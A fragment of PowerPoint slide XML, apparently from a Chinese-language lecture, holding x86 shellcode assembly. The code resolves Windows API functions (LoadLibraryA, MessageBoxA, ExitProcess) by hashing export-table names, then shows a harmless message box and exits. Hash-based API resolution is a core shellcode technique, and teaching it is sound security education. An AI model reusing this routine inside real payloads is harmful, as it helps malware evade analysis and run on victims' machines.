                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>push 0x74736577     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//push "</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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</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call[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x04]        </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MessageBoxA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(NULL,"</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",NULL)</a:t>
            </a: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call[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> - 0x08]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ExitProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(0);</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nop</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18906488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3B897E17-0513-0FB5-9333-4FB3D55BB184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773943" y="1052452"/>
            <a:ext cx="5111750" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>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esi</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> * 4]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从列表数组中读取</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esi</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esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>函数名称所在地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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cdq</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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = 0</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函数名的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运算  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hash_loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movsx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> al, ah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字符串结尾就跳出当前函数  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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jz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>compare_hash</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ror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, 7</a:t>
            </a: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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,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inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hash_loop</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比较找到的当前函数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>是否是自己想找的 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>compare_hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a: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cmp</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edx</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> + 0x1C]</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lods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>pushad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>+1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LoadLibraryA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>next_function_loop</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+ 0x24]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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>顺序表的相对偏移量</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顺序表的基地址</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di, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> + 2 * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</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匹配函数的序号</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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> + 0x1C]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地址表的相对偏移量</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地址表的基地址</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add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</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+ 4 * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</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函数的基地址        </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B018439-62F1-741F-FBBF-1E709E4F9BDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313488" y="1046975"/>
            <a:ext cx="5111750" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;==&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>交换</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>pop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stosd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">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把找到的函数保存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>的位置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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edi</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popad</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, 0x1e380a6a    </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找到最后一个函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MessageBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>后，跳出循环</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>find_lib_functions</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//======</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>让他做些自己想做的事</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>function_call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,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0x74736577</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>push 0x74736577     </a:t>
